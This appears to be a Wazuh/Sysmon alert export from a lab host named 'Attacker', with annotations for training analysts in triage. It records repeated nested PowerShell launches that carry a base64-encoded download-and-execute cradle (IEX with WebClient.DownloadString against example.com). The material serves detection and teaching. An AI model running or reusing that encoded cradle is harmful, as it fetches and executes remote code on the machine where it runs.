data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 58 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534256.1442056 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:34.8542189Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283902 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:34.803
ProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00}
ProcessId: 13716
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_awdjgktt.o0r.ps1
CreationUtcTime: 2025-04-24 22:37:34.803
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:34.803 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awdjgktt.o0r.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:34.803 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 55 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534260.1444825 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:37.7599742Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283927 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:36.286
ProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00}
ProcessId: 5012
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00}
ParentProcessId: 13716
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:36.286 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd30-680a-4e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 59 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534260.1452892 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:37.9972832Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283932 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:37.993
ProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00}
ProcessId: 5012
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_esc2b0h1.abg.ps1
CreationUtcTime: 2025-04-24 22:37:37.990
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:37.993 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd30-680a-4e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_esc2b0h1.abg.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:37.990 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 56 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534263.1455657 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:40.4496218Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283985 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:39.119
ProcessGuid: {94294ddc-bd33-680a-510b-000000000e00}
ProcessId: 14452
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00}
ParentProcessId: 5012
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:39.119 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd33-680a-510b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14452 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 60 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534263.1463724 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:40.7271675Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283987 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:40.661
ProcessGuid: {94294ddc-bd33-680a-510b-000000000e00}
ProcessId: 14452
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_11mj13ze.ayt.ps1
CreationUtcTime: 2025-04-24 22:37:40.661
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:40.661 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
